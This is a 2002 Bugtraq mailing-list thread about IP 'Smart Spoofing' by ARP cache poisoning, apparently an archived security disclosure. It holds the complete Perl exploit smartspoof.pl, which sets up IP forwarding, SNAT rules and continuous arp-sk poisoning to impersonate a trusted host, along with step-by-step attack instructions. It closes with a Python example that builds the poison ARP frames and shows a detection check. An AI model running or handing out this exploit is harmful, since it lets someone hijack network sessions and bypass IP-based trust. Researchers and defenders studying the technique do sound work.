Bugtraq mailing list archives

RE: Exploit code for IP Smart Spoofing


From: "shannong" <shannong () texas net>
Date: Sat, 16 Nov 2002 12:18:46 -0600

The idea behind Smartspoof is definitely not new.  I don't really need any
software to accomplish this outside of arp-sk.

1. If I have access to a transport medium with any router that is
multi-access (i.e. Ethernet) then I can physically assign the IP address
of the client I want to spoof regardless of the router's subnet address.

2. I use arp-sk or any other method of providing the router with my MAC
address associated with the IP I've assumed.

3. Now I can initiate any session I want through that router as the
"spoofed" client.

4. Any traffic from my machine to that router will keep my MAC address
in its ARP table.


Of course the spoofed client would lose the ability to generate traffic
on its own through our newly spoofed router.  I assume this is the
"service" that Smartspoof provides.


In response to Stephen's mitigation techniques, they are wholly
ineffective. This is ARP poisoning, not ARP spoofing. Current switches
cannot detect or stop the behavior described by the Smartspoof method
or any other ARP-poisoning method.  The ARP poisoning takes place in the
data portion of the packet, not the Ethernet header.  The switch in
question always sees traffic destined to and from my real MAC address in
the Ethernet header. However, the data portion of the packet carries the
fake IP-to-MAC association sent to the router.  Switches do not care about
or look at the data portion.  The router now thinks the spoofed IP in
question has my MAC address.  Any traffic to this spoofed IP from the
router will now be destined to my real MAC.  Therefore, the switch only
sees one MAC on my port, which is my real MAC.

This can be seen 
-----Original Message-----
From: Stephen Gill [mailto:gillsr () yahoo com] 
Sent: Wednesday, November 13, 2002 1:33 PM
To: 'Laurent Licour'; bugtraq () securityfocus com
Subject: RE: Exploit code for IP Smart Spoofing


In order to mitigate this on edge switches it may behoove the network
administrator to review his or her security policy and adhere to
stricter guidelines.  The following document suggests one method for
protecting Cisco switches along with additional guidelines for secure
configuration in a template format.

http://www.qorbit.net/documents/catalyst-secure-template.pdf
http://www.qorbit.net/documents/catalyst-secure-template.htm

Comments or suggestions welcome.
-- steve

-----Original Message-----
From: Laurent Licour [mailto:llicour () althes fr] 
Sent: Tuesday, November 12, 2002 6:21 AM
To: 'bugtraq () securityfocus com'
Subject: Exploit code for IP Smart Spoofing


Hello

As we reported in our previous article, IP Smartspoofing
(http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced
a new method for IP spoofing, allowing a full connection from any client
software.

The exploit code smartspoof.pl is a proof of concept (for educational
purposes only) of the Smart Spoofing method.

The additional software "arp-fillup" is necessary to achieve this:
http://www.althes.fr/ressources/tools/arp-fillup/arp-fillup-0.1.tgz

These tools are also available on
http://www.althes.fr/ressources/avis/smartspoofing.htm#tools


Exploit code (Perl source):

#!/usr/bin/perl -w
#
# smartspoof.pl
#
# This script is provided as proof of concept for educational purpose only
#
# Laurent Licour 28/10/02
# llicour () althes fr
# Althes (http://www.althes.fr)
#
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
#
# Require linux 2.4 (tested on Redhat 7.3)
# Require NetAddr::IP perl package (www.cpan.org)
# Require arp-sk tool (www.arp-sk.org)
# Require arp-fillup tool (www.althes.fr/ressources/avis/smartspoofing.htm)
# Require iptables (www.iptables.org)

use strict;
use Getopt::Long;
use NetAddr::IP;

# Longest-prefix lookup in the output of "route -n": returns the gateway
# for $ip0 (or $ip0 itself when the route is directly connected) and
# stores the outgoing interface in $$int.
sub get_ip_next_hop
{
  my ($ip0, $int) = @_;
  my $ip=new NetAddr::IP $ip0;

  open(ROUTE, "route -n |") or die "Error : cannot run route -n\n";
  <ROUTE>; <ROUTE>;    # skip the two header lines
  my $gateway="";
  my $masklen; my @fields; my $line; my $entry;
  while($line = <ROUTE>)
  {
    # Destination Gateway Genmask Flags Metric Ref Use Iface
    @fields = split / +/, $line;
    $entry=new NetAddr::IP($fields[0] . "/" . $fields[2]);
    if ($entry->contains($ip))
    {
      if (($gateway eq "") or ($masklen < $entry->masklen()))
      {
        $gateway = $fields[1];
        $masklen = $entry->masklen();
        $$int = $fields[7];
        chop $$int;
      }
    }
  }
  close(ROUTE);
  die "Error : No route for $ip \n" if ($gateway eq "");
  $gateway=$ip->addr() if ($gateway eq "0.0.0.0");

  return($gateway);
}

# MAC address of $ip as cached in /proc/net/arp (the ping forces the entry).
sub get_mac
{
  my $ip=shift;
  my $cmd="ping -c 1 -w 1 $ip >/dev/null 2>&1";
  system($cmd);
  $cmd="cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'";
  my $mac=`$cmd`;
  chop($mac);
  return($mac);
}

sub usage
{
  print "Start/Stop smartspoofing\n\n";
  print "This is the proof of concept of the smartspoofing technique\n";
  print "(visit http://www.althes.fr/ressources/avis/smartspoofing.htm)\n";
  print "\n";
  print "You only have to specify :\n";
  print " -D : address of the filtering equipment to connect to\n";
  print " -S : address of the trusted host to spoof\n";
  print "\n";
  print "Then, you only need to launch your favorite client software from this host\n";
  print "or any host behind this (because it is now a router)\n";
  print "\n";
  print "This script is provided as proof of concept for educational purpose only.\n";
  print "\n";

  exit 0;
}

my $syntax = "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S <\@IP source> -start|-stop\n";

my $ver = "smartspoof.pl v1.0 28/10/02\n";

my ($ipsrc, $ipdst);
my ($start, $stop);
my $interface = "";
my ($version, $help);

Getopt::Long::GetOptions(
           "D=s" => \$ipdst,
           "S=s" => \$ipsrc,
           "i=s" => \$interface,
           "v" => \$version,
           "h" => \$help,
           "start" => \$start,
           "stop" => \$stop
          ) or die $syntax;


usage if $help;
die $ver if $version;
die $syntax unless @ARGV == 0;
die $syntax unless defined($ipsrc) and defined($ipdst);
die $syntax unless defined($start) or defined($stop);
die $syntax if $start and $stop;

my $cmd;

# Next hop toward each address: the router whose ARP cache gets poisoned
# is the one on the path to -D; when -S is on the local segment, its next
# hop is -S itself.
my ($intsrc, $intdst);
my $ipsrc_next_hop = get_ip_next_hop($ipsrc, \$intsrc);
my $ipdst_next_hop = get_ip_next_hop($ipdst, \$intdst);
$interface=$intdst if ($interface eq "");


if ($start)
{
  print "Activate IP Forwarding\n";
  system("echo 1 > /proc/sys/net/ipv4/ip_forward");

  print "Activate Arp fillup on $ipsrc\n";
  system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &");

  # Packets leaving toward -D carry the spoofed source address.
  print "Set NAT rule on iptables\n";
  $cmd="iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT --to $ipsrc";
  system($cmd);

  print "Deactivate ICMP Redirect\n";
  system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j DROP");

  # One ARP request, then a background stream of unsolicited replies so the
  # router keeps mapping $ipsrc_next_hop to this host's MAC.
  print "Activate Arp cache poisoning of $ipsrc_next_hop entry on $ipdst_next_hop on $interface\n";
  $cmd="arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D $ipdst_next_hop -c 1 >/dev/null 2>&1";
  system($cmd);
  $cmd="arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D $ipdst_next_hop >/dev/null 2>&1 &";
  system($cmd);
}
elsif ($stop)
{
  print "Suppress Arp fillup on $ipsrc\n";
  system("killall arp-fillup");

  # Put the real MAC of $ipsrc_next_hop back into the router's cache.
  print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on $ipdst_next_hop\n";
  system("killall arp-sk");
  my $mac=get_mac($ipsrc_next_hop);
  $cmd="arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1";
  system($cmd);

  print "Clear iptables rules\n";
  system("service iptables stop");
  system("service iptables start");

  print "Deactivate ip forwarding\n";
  system("echo 0 > /proc/sys/net/ipv4/ip_forward");
}




Regards

Laurent Licour
mailto:llicour () althes fr
Althes
http://www.althes.fr




*---------------------------------------------------------------*
* This e-mail and all attachments are intended solely for the
* persons to whom they are specifically addressed and bind only
* the signatory of these documents, not the organisation to which
* he or she belongs.
* Their existence and their contents are confidential.
* Any unauthorised use or distribution is prohibited.
* If you have received this e-mail, or hold it without being its
* intended recipient, please inform us immediately.
* This notice confirms that this message has been checked and
* contained no virus known to date; nevertheless any electronic
* message is susceptible to alteration.
* We decline all responsibility for this message if it has been
* altered, distorted or falsified.
*---------------------------------------------------------------*
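The following is an example added to this archive page; it is not code from any of the three posts above, nor from smartspoof.pl, arp-sk or arp-fillup. It builds the ARP frames that the script's "arp-sk -r -S ... -D ..." lines put on the wire, in both the -start (poison) and -stop (restore) form, parses them back, and shows the point made at the top of the thread about switches: the Ethernet source address, which is all a plain switch learns from, is the attacker's own MAC in every frame, while the ARP payload is what the router's cache is built from. It also includes the payload-level comparison against a known IP-to-MAC binding that a device would need in order to notice the poisoned entry. It assumes arp-sk's default of using the local interface MAC as the Ethernet source when -s is not given; all addresses and the binding table are constructed for the example.

```python
"""Added example, not code from any of the posts above or from smartspoof.pl.
Builds the ARP frames that arp-sk's -S/-D options put on the wire (assuming
its default of using the local interface MAC as the Ethernet source), parses
them back, and shows what a switch learns from the Ethernet header versus what
the router learns from the ARP payload.  All MAC and IP addresses and the
binding table are constructed for this example."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed lab addresses.
ATTACKER_MAC = "00:0c:29:aa:bb:cc"                        # only MAC the switch port sees
VICTIM_IP, VICTIM_MAC = "10.0.0.10", "00:0c:29:11:22:33"  # host being spoofed (-S)
ROUTER_IP, ROUTER_MAC = "10.0.0.1", "00:00:0c:07:ac:01"   # next hop being poisoned

# Known-good IP -> MAC bindings (what a static table or DHCP snooping would hold).
BINDINGS = {VICTIM_IP: VICTIM_MAC, ROUTER_IP: ROUTER_MAC}


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def fmt_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def fmt_ip(b):
    return ".".join(str(x) for x in b)


def build_arp_frame(eth_src, eth_dst, op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II header followed by a 28-byte ARP body (htype 1, ptype IPv4)."""
    eth = mac_bytes(eth_dst) + mac_bytes(eth_src) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp_frame(frame):
    eth_dst, eth_src, eth_type = struct.unpack("!6s6sH", frame[:14])
    if eth_type != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP encoding")
    body = frame[22:42]
    return {"eth_src": fmt_mac(eth_src), "eth_dst": fmt_mac(eth_dst), "op": op,
            "sender_mac": fmt_mac(body[0:6]), "sender_ip": fmt_ip(body[6:10]),
            "target_mac": fmt_mac(body[10:16]), "target_ip": fmt_ip(body[16:20])}


def poison_frame():
    """What 'arp-sk -r -S VICTIM_IP -D ROUTER_IP' sends: a reply whose ARP sender
    is the victim's IP paired with the attacker's own MAC."""
    return build_arp_frame(ATTACKER_MAC, ROUTER_MAC, ARP_REPLY,
                           ATTACKER_MAC, VICTIM_IP, ROUTER_MAC, ROUTER_IP)


def restore_frame():
    """What the script's -stop path sends ('-S VICTIM_IP:VICTIM_MAC'): the same
    reply carrying the victim's real MAC, still sent from the attacker's port."""
    return build_arp_frame(ATTACKER_MAC, ROUTER_MAC, ARP_REPLY,
                           VICTIM_MAC, VICTIM_IP, ROUTER_MAC, ROUTER_IP)


def switch_view(frames):
    """MAC learning as a plain switch does it: Ethernet source addresses only."""
    return {parse_arp_frame(f)["eth_src"] for f in frames}


def router_cache(frames):
    """ARP cache as the router builds it: sender IP -> sender MAC from the payload."""
    cache = {}
    for f in frames:
        p = parse_arp_frame(f)
        cache[p["sender_ip"]] = p["sender_mac"]
    return cache


def inspect_arp(frame, bindings=BINDINGS):
    """Payload-level check needed to catch the poison: the sender IP/MAC pair is
    compared with the known binding, and the ARP sender MAC with the Ethernet
    source MAC.  Returns a list of findings (empty when nothing is off)."""
    p = parse_arp_frame(frame)
    findings = []
    expected = bindings.get(p["sender_ip"])
    if expected is not None and expected != p["sender_mac"]:
        findings.append(f"{p['sender_ip']} claimed by {p['sender_mac']}, binding says {expected}")
    if p["sender_mac"] != p["eth_src"]:
        findings.append(f"ARP sender MAC {p['sender_mac']} differs from Ethernet source {p['eth_src']}")
    return findings


if __name__ == "__main__":
    frames = [poison_frame(), restore_frame()]
    print("switch learns on the port:", switch_view(frames))
    print("router cache after poison:", router_cache(frames[:1]))
    for f in frames:
        print(inspect_arp(f) or ["no findings"])
```

Running it shows the switch learning a single MAC from both frames while the router's cache moves from the attacker's MAC to the victim's; the poison frame only trips the binding comparison, and the restore frame only trips the sender-versus-Ethernet-source comparison, so either check alone misses one of the two.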


